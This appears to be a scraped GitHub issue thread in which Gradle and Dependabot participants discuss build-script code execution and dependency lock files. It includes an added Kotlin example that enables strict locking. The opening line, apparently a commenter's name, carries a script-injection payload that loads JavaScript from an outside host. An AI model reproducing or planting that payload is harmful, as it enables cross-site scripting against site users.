Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Gradle also has a Dependency Lock File, although it's not enabled by default and many projects still don't take advantage of it. https://docs.gradle.org/current/userguide/dependency_locking.html
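As an added illustration of the lock-file feature referred to in the comment above (example code, not from the thread or from Gradle's own sources): a minimal `build.gradle.kts` that turns dependency locking on for every configuration and switches it to strict mode, so a dynamic version such as `30.+` can no longer resolve to a newer artifact than the one recorded in `gradle.lockfile`. The plugin, repository and the Guava coordinate are assumptions chosen for the example; the DSL calls themselves are the ones documented at the linked page.

```kotlin
// build.gradle.kts (added example; not part of the original thread)
plugins {
    `java-library`          // assumed: any JVM plugin that creates resolvable configurations
}

repositories {
    mavenCentral()          // assumed repository
}

// Lock every resolvable configuration. Without this block, a version range or
// "latest" style version is re-resolved on every build and can silently change
// which artifact ends up on the classpath.
dependencyLocking {
    lockAllConfigurations()
    // STRICT makes the build fail when a locked configuration resolves to a
    // version that is not in gradle.lockfile, rather than only warning.
    lockMode.set(LockMode.STRICT)
}

dependencies {
    // Dynamic version used on purpose to show what locking pins down.
    implementation("com.google.guava:guava:30.+")
}
```

Run `./gradlew dependencies --write-locks` once to generate `gradle.lockfile` next to the build script and commit it; from then on `./gradlew build` resolves only the versions recorded there, and an intentional bump is done with `./gradlew dependencies --update-locks com.google.guava:guava`. The lock state covers only project configurations; plugin and buildscript dependencies need their own `buildscript { dependencyLocking { lockAllConfigurations() } }` block, which is why, as the rest of the thread notes, a lock file alone does not cover everything a build script can pull in.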
Would this issue be more appropriate if it had been opened against the Dependabot Feedback Repo? If it is, feel free to move this issue there. https://github.com/dependabot/feedback
Hi @greysteil, > I've just been super busy with the GitHub announcement (sorry). Don't worry about it. Congratulations by the way! This is awesome news! > We don't do this...
> For now we think the safest way to ensure nothing can be stolen when executing unsafe code is to have nothing worth stealing accessible to that code, though. Sounds...
Some additional details from one of our internal discussion threads. Thanks to @melix who I'm quoting from below: > Gradle source files _are_ code. Dependencies can be added in very...
@apapia Unfortunately, this would only work for newer versions of Gradle, and we'd have to start enabling dependency locking by default. Currently, there are over 2 million Gradle projects on...
Unfortunately, I don't believe that we (Gradle) have a good solution for this right now. I do believe it's a problem we need to figure out how to resolve.
> Fair, there are many ways to describe versions outside of the `build.gradle.kts` file for a dependency, so it wouldn't be trivial to do This is very true. We, Gradle,...
Hi Everyone, After several years of discussion on this issue I'm actively working on a POC for this feature that will hopefully become the fully implemented solution. There are two...
> When that happens, we have multiple "good versions". I agree this is indeed a problem. Currently it's "out of scope" and will require manual intervention to update your build...